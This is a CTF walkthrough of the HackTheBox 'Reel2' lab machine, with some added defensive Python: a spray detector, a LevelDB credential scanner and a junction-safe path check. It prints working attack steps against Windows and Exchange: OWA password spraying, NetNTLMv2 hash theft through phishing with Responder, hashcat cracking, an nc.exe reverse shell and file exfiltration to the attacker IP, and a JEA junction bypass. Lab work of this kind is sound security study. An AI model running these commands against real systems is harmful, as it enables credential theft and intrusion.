Introduction

OS: Windows
Difficulty: Hard
Points: 40
Release: 03 Oct 2020
IP: 10.10.10.210
User Blood: xct, 00 days, 03 hours, 08 mins, 20 seconds
Root Blood: xct, 00 days, 07 hours, 06 mins, 12 seconds
First, run nmap as usual.
```
root@kali:~/hackthebox/machine/reel2
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Microsoft IIS httpd 8.5
443/tcp  open  ssl/https?
5985/tcp open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
6001/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
6002/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
6004/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
6005/tcp open  msrpc      Microsoft Windows RPC
6006/tcp open  msrpc      Microsoft Windows RPC
6007/tcp open  msrpc      Microsoft Windows RPC
6008/tcp open  msrpc      Microsoft Windows RPC
6010/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
6011/tcp open  msrpc      Microsoft Windows RPC
6012/tcp open  msrpc      Microsoft Windows RPC
6027/tcp open  msrpc      Microsoft Windows RPC
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.2.32)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
Enumerating HTTP on port 80 only returns 403 Forbidden.
Enumerating HTTPS on port 443: use gobuster to find directories.
```
root@kali:~/hackthebox/machine/reel2
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.210
[+] Threads:        50
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/12 22:34:11 Starting gobuster
===============================================================
/public (Status: 302)
/exchange (Status: 302)
/Public (Status: 302)
/rpc (Status: 401)
/owa (Status: 301)
```
Go to /owa first. It is a login page; I tried some SQL injection, but nothing worked.
Create an account on the sign-up page. On the home page there are many users listed.
Gather all the usernames into a user.txt file.
```
sven
svensson
s.svensson
```
In the Posts tab, a post by the svensson user gives a hint: "This summer is so hot!"
Create a pass.txt from this hint.
```
root@kali:~/hackthebox/machine/reel2
root@kali:~/hackthebox/machine/reel2
Summer
Summer1
Summer07
Summer08
...
```
With user.txt and pass.txt, let's brute-force the OWA login.
We don't brute-force the OWA login with wfuzz or hydra here; instead we install a tool called SprayingToolkit.
Install the tool's requirements before running it.
Let's run the tool.
```
root@kali:~/SprayingToolkit
[*] Starting spray at 2020-10-13 03:40:56 UTC
[-] Authentication failed: svensson:Summer2020 (Invalid credentials)
[-] Authentication failed: sven:Summer2020 (Invalid credentials)
[+] Found credentials: s.svensson:Summer2020 (Invalid credentials)
```
Username = s.svensson
Password = Summer2020
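Seen from the defender's side, the spray above has a distinct shape: one source, many accounts, one or two failures each, inside a short window. The following Python is an added example (mine, not the writeup's or SprayingToolkit's) that runs that logic over a constructed OWA-style authentication log; the log format and the a.example/b.example accounts are assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample (not from the box): "<utc time> <source ip> <user> <outcome>" per line.
# The first block mimics one spray round against an OWA endpoint; the second is one user
# failing repeatedly, which is a brute-force pattern rather than a spray.
SAMPLE_LOG = """\
2020-10-13T03:40:56Z 10.10.14.3 svensson FAIL
2020-10-13T03:40:57Z 10.10.14.3 sven FAIL
2020-10-13T03:40:58Z 10.10.14.3 s.svensson OK
2020-10-13T03:41:03Z 10.10.14.3 k.svensson FAIL
2020-10-13T03:41:05Z 10.10.14.3 a.example FAIL
2020-10-13T03:41:07Z 10.10.14.3 b.example FAIL
2020-10-13T03:55:00Z 10.10.14.9 b.example FAIL
2020-10-13T03:56:00Z 10.10.14.9 b.example FAIL
2020-10-13T03:57:00Z 10.10.14.9 b.example OK
"""

def parse(text):
    """Parse log lines into (time, ip, user, outcome) tuples, oldest first."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, ip, user, outcome = line.split()
            events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user, outcome))
    return sorted(events)

def detect_spray(text, window=timedelta(minutes=10), min_users=4, max_per_user=2):
    """Flag a source that fails against many distinct users, each only a few times,
    inside one time window: the spray signature. Any success from the same source in
    that window is reported as a probable compromised account."""
    recent = defaultdict(deque)     # ip -> events seen within the last `window`
    alerts = {}
    for event in parse(text):
        ts, ip = event[0], event[1]
        q = recent[ip]
        q.append(event)
        while ts - q[0][0] > window:
            q.popleft()
        fails, hits = defaultdict(int), set()
        for _, _, user, outcome in q:
            if outcome == "OK":
                hits.add(user)
            else:
                fails[user] += 1
        if len(fails) >= min_users and max(fails.values()) <= max_per_user:
            alerts[ip] = {"first_seen": q[0][0], "users": sorted(fails),
                          "compromised": sorted(hits)}
    return alerts
```

The brute-force pattern from 10.10.14.9 is deliberately not flagged here; it needs a separate per-account threshold.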
Get shell

The site is in another language. Let's open it in Chromium so we can understand what's going on.
Now I understand what's going on here: it's a mail server, and I think we need to do some phishing.
If you don't know about that, here is an interesting article:
NetNTLMv2 hash stealing using Outlook
So what we do now is compose a new message:
1. Click on New message.
2. Select all users with Control+A, then click the To button at the bottom. This sends our email to each and every user.
3. Give the subject as you wish, and in the body enter your HTB IP, like http://10.10.14.3
Before sending this email, start Responder.
Boom, after a couple of minutes we get the response back.
First we need to crack this hash with hashcat. We know this is a NetNTLMv2 hash.
```
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force
```
username = k.svensson
password = kittycat1
Evil-WinRM does not work in this situation because port 5985 is not open.
So we use PowerShell on Linux to log in. First, install PowerShell for Linux.
```
apt install gss-ntlmssp
apt-get install powershell
```
After installation, PowerShell is available as pwsh.
Now log in with pwsh.
```
root@kali:~
PowerShell 7.0.0
Copyright (c) Microsoft Corporation. All rights reserved.

https://aka.ms/powershell
Type 'help' to get help.

A new PowerShell stable release is available: v7.0.3
Upgrade now, or check out the release page at:
  https://aka.ms/PowerShell-Release?tag=v7.0.3

PS /root> $offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson

PowerShell credential request
Enter your credentials.
Password for user k.svensson: *********

PS /root> Enter-PSSession $offsec_session
[10.10.10.210]: P>
```
In this session, commands like dir, ls, cd and whoami won't work.
$env:username and $env:domainname do work.
```
[10.10.10.210]: P> $env:username
k.svensson
```
We need to execute PowerShell commands inside a script block.
```
[10.10.10.210]: P> &{ cd ../Desktop }
[10.10.10.210]: P> &{ ls }

    Directory: C:\Users\k.svensson\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2020/7/30     13:19           2428 Sticky Notes.lnk
-ar---       2020/10/13      9:17             34 user.txt

[10.10.10.210]: P> &{ type user.txt }
210ff91b4373ae60dbc352737555b4b4
```
Get root

Now let's turn this interface into a proper shell. For that we need to transfer an nc.exe file and get a reverse shell.
Open a simple HTTP server.
```
root@kali:~/hackthebox/machine/reel2
nc.exe  pass.txt  user.txt
root@kali:~/hackthebox/machine/reel2
```
Transfer nc.exe to the system.
After running that, open a netcat listener.
```
[10.10.10.210]: PS> &{ iwr -uri http://10.10.14.3/nc.exe -o 'C:\Windows\System32\spool\drivers\color\nc.exe' }
[10.10.10.210]: PS> &{ cd 'C:\Windows\System32\spool\drivers\color\' }
[10.10.10.210]: PS> &{ ./nc.exe 10.10.14.3 9001 -e powershell.exe }
```
And we get a reverse shell.
```
root@kali:~
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.210.
Ncat: Connection from 10.10.10.210:57417.
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\System32\spool\drivers\color> whoami
whoami
htb\k.svensson
```
We found nothing in our enumeration process, so let's check the logs for anything interesting.
```
PS C:\> dir
dir

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        7/30/2020  12:15 PM                ExchangeSetupLogs
d-----        7/30/2020  12:02 PM                inetpub
d-----        8/22/2013   5:52 PM                PerfLogs
d-r---        10/8/2020   3:29 PM                Program Files
d-----        7/30/2020  11:48 AM                Program Files (x86)
d-r---        7/30/2020   1:17 PM                Users
d-----        9/29/2020   6:09 PM                Windows
d-----        7/28/2020   2:57 PM                xampp
```
We find a 000003.log file under our current user's AppData directory. Let's look at it.
```
PS C:\Users\k.svensson\AppData\Roaming\stickynotes\Local Storage\leveldb> ls
ls

    Directory: C:\Users\k.svensson\AppData\Roaming\stickynotes\Local Storage\leveldb

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        10/8/2020   3:34 PM           2320 000003.log
-a----        7/30/2020   1:19 PM             16 CURRENT
-a----        7/30/2020   1:19 PM              0 LOCK
-a----       10/13/2020   9:22 AM              0 LOG
-a----        10/8/2020   3:34 PM            182 LOG.old
-a----        7/30/2020   1:19 PM             41 MANIFEST-000001
```
When we use the type command on 000003.log, it gives us gibberish.
So we need to get that file onto our local machine, and we use nc.exe to transfer it.
Open a listener on your local machine to receive the file content.
```
nc -nvlp 1234 > 000003.log
```
In the Windows reverse shell, type these commands.
```
PS C:\Users\k.svensson\AppData\Roaming\stickynotes\Local Storage\leveldb> cd /
cd /
PS C:\> cmd
cmd
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\>cd "C:\Windows\System32\spool\drivers\color\"
cd "C:\Windows\System32\spool\drivers\color\"
C:\Windows\System32\spool\drivers\color>nc.exe 10.10.14.3 1234 < "C:\users\k.svensson\appdata\roaming\stickynotes\Local Storage/leveldb\000003.log"
nc.exe 10.10.14.3 1234 < "C:\users\k.svensson\appdata\roaming\stickynotes\Local Storage/leveldb\000003.log"
```
Let’s check our netcat listener.
```
root@kali:~/hackthebox/machine/reel2
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.210.
Ncat: Connection from 10.10.10.210:51827.
```
Use the strings command to see the readable content of 000003.log.
```
root@kali:~/hackthebox/machine/reel2
VERSION
META:app://.
_app://.
__storejs__test__Z
META:app://.
_app://.
{"first":"<p>Credentials for JEA</p><p>jea_test_account:Ab!Q@vcg^%@#1</p>","back":"rgb(255, 242, 171)","title":"rgb(255, 235, 129)","wid":"350","hei":"375","deleted":"no","closed":"yes","locked":"no"}
_app://.
__storejs__test__
_app://.
closed
{"closed":"yes"}
_app://.
{"ids":"1"}y
META:app://.
_app://.
__storejs__test__
_app://.
closed
@:lK
META:app://.
_app://.
closed
{"closed":"yes"}
META:app://.
_app://.
__storejs__test__
_app://.
closed
META:app://.
_app://.
closed
{"closed":"yes"}
META:app://.
_app://.
__storejs__test__
_app://.
closed
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__P
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__]
META:app://.
_app://.
closed
{"closed":"yes"}
META:app://.
_app://.
__storejs__test__
_app://.
closed:
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__b
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__N
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
```
Now we have a username and password (the full password, as shown in the note above, is Ab!Q@vcg^%@#1).
```
username = jea_test_account
password = Ab!Q@vcg^%@#1
```
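strings works, but the same artifact can be parsed properly. As an added example (not from the writeup), this Python reads the LevelDB log format that Electron/Chromium Local Storage uses (record headers, write batches, varint-prefixed keys and values, Chromium's 0x00/0x01 text-encoding prefix) and reports stored values that look like credentials, which is how an examiner audits an endpoint for secrets kept in app local storage; the sample log bytes and the svc_example note are constructed, not the box's file.

```python
import re, struct
FULL, FIRST, MIDDLE, LAST = 1, 2, 3, 4            # leveldb log record types
BLOCK = 32768                                      # leveldb log block size

def _varint(buf, pos):                             # LEB128 varint32 -> (value, new_pos)
    value = shift = 0
    while True:
        b, pos = buf[pos], pos + 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7

def records(data):                                 # logical records, fragments reassembled
    pos, partial = 0, b""
    while pos + 7 <= len(data):
        rem = BLOCK - pos % BLOCK                  # a trailer under 7 bytes is zero padding
        if rem < 7: pos += rem; continue
        _crc, length, rtype = struct.unpack_from("<IHB", data, pos)
        chunk, pos = data[pos + 7:pos + 7 + length], pos + 7 + length
        partial = chunk if rtype == FIRST else partial + chunk
        if rtype in (FULL, LAST): yield partial; partial = b""

def entries(data):                                 # (key, value) per put; value None = delete
    for rec in records(data):
        count, pos = struct.unpack_from("<I", rec, 8)[0], 12   # 8-byte seq, 4-byte count
        for _ in range(count):
            kind, pos = rec[pos], pos + 1
            klen, pos = _varint(rec, pos)
            key, pos = rec[pos:pos + klen], pos + klen
            value = None
            if kind == 1:                          # kTypeValue (0 = kTypeDeletion)
                vlen, pos = _varint(rec, pos)
                value, pos = rec[pos:pos + vlen], pos + vlen
            yield key, value

def chromium_text(raw):                            # 0x00 prefix = UTF-16LE, 0x01 = Latin-1
    return raw[1:].decode("utf-16-le" if raw[:1] == b"\x00" else "latin-1")

def find_notes(data, pattern=r"(?i)credential|password"):  # -> [(origin, text)]
    return [(k.split(b"\x00", 1)[0].decode(), chromium_text(v))
            for k, v in entries(data)                # "_origin\0\1key" data keys, not META:
            if v is not None and k.startswith(b"_") and re.search(pattern, chromium_text(v))]
# Constructed sample, not the box's file: one FULL record holding a two-put write batch.
def _put(key, val):                                # single-byte varints, so len < 128
    return b"\x01" + bytes([len(key)]) + key + bytes([len(val)]) + val
_NOTE = b'\x01{"first":"<p>Credentials for JEA</p><p>svc_example:placeholder-pass</p>"}'
_BATCH = (struct.pack("<QI", 7, 2) + _put(b"_app://.\x00\x01first", _NOTE)
          + _put(b"_app://.\x00\x01closed", b'\x01{"closed":"yes"}'))
SAMPLE_LOG = struct.pack("<IHB", 0, len(_BATCH), FULL) + _BATCH   # CRC left 0; not verified
```

On a real file, read it in binary and pass the bytes to find_notes; the CRC is not verified here, so corrupt records are parsed as-is.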
Privilege escalation

Looking at the JEA configuration for jea_test_account (the .psrc role capability and the .pssc session configuration), the Check-File command only reads a file when its path is under C:\ProgramData.
So what we can do is create a symlink (junction) inside the ProgramData directory that points to the Administrator directory.
Be sure to run this command in PowerShell (PS), not cmd.
```
PS C:\> New-Item -ItemType Junction -Path 'C:\ProgramData\root' -Target 'C:\Users\Administrator'
New-Item -ItemType Junction -Path 'C:\ProgramData\root' -Target 'C:\Users\Administrator'

    Directory: C:\ProgramData

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d----l       10/13/2020  11:02 AM                root
```
The command executes successfully.
So when we log in as jea_test_account, we can reach the Administrator directory through the junction as well.
Now we need to log in as jea_test_account. Open a new terminal and type pwsh.
Run the commands one by one.
```
root@kali:~
PowerShell 7.0.0
Copyright (c) Microsoft Corporation. All rights reserved.

https://aka.ms/powershell
Type 'help' to get help.

A new PowerShell stable release is available: v7.0.3
Upgrade now, or check out the release page at:
  https://aka.ms/PowerShell-Release?tag=v7.0.3

PS /root> $username = "jea_test_account"
PS /root> $password = ConvertTo-SecureString "Ab!Q@vcg^%@#1" -AsPlainText -Force
PS /root> $cred = New-Object System.Management.Automation.PSCredential -ArgumentList ($username, $password)
PS /root> Enter-PSSession -Computer 10.10.10.210 -credential $cred -ConfigurationName jea_test_account -verbose -debug -Authentication Negotiate
[10.10.10.210]: PS>Check-File C:\programdata\root\Desktop\root.txt
18c458e91c1f45379bc97905034c8ad8
```
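The root of this escalation is that Check-File trusts a textual path prefix, which a junction under C:\ProgramData defeats. This added Python example (mine, not the box's JEA code) puts that naive check beside a hardened one that resolves links and rejects any link component under the allowed root; a symlink stands in for the NTFS junction so the demo runs on any OS.

```python
import os
import tempfile

def naive_check(path, root):
    """The pattern the writeup abuses: a textual prefix test on the requested path.
    A junction or symlink placed under root makes an outside file pass this test."""
    return os.path.normcase(os.path.abspath(path)).startswith(os.path.normcase(root))

def hardened_check(path, root):
    """Resolve links first, require the real file to sit under the real root, and
    refuse any link in the path below root (on Windows, Python 3.12+ can also test
    os.path.isjunction for each component)."""
    real_root, real_path = os.path.realpath(root), os.path.realpath(path)
    if os.path.commonpath([real_root, real_path]) != real_root:
        return False
    current = root
    for part in os.path.relpath(path, root).split(os.sep):
        current = os.path.join(current, part)
        if os.path.islink(current):            # a reparse point inside the allowed tree
            return False
    return True

def demo():
    """Rebuild the writeup's layout in a temp dir: ProgramData/root -> Administrator.
    Returns what each check says about the file reached through the link and about
    a legitimate file directly under the allowed root."""
    with tempfile.TemporaryDirectory() as tmp:
        allowed = os.path.join(tmp, "ProgramData")
        admin = os.path.join(tmp, "Administrator")
        os.mkdir(allowed)
        os.mkdir(admin)
        with open(os.path.join(admin, "root.txt"), "w") as f:
            f.write("flag-placeholder")             # constructed stand-in for root.txt
        with open(os.path.join(allowed, "notes.txt"), "w") as f:
            f.write("legit")
        os.symlink(admin, os.path.join(allowed, "root"))   # the junction from the writeup
        via_link = os.path.join(allowed, "root", "root.txt")
        legit = os.path.join(allowed, "notes.txt")
        return {
            "naive_link": naive_check(via_link, allowed),
            "hardened_link": hardened_check(via_link, allowed),
            "naive_legit": naive_check(legit, allowed),
            "hardened_legit": hardened_check(legit, allowed),
        }
```

The same fix applies to the JEA function itself: resolve the path with Resolve-Path/GetFullPath and reject ReparsePoint attributes before comparing against the allowed prefix.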
Summary of knowledge

Brute-force the OWA login using SprayingToolkit.
NetNTLMv2 hash stealing using Outlook.
Responder to capture the NetNTLMv2 hash.
hashcat to crack the NetNTLMv2 hash.
Log in with pwsh.
Execute PowerShell commands inside a script block.
iwr to download files.
nc.exe to transfer a file.
Create a symlink (junction) in the ProgramData directory pointing to the Administrator directory, then use Check-File to read the root flag.
QQ: 1185151867
twitter: https://twitter.com/fdlucifer11
github: https://github.com/FDlucifer
I'm lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…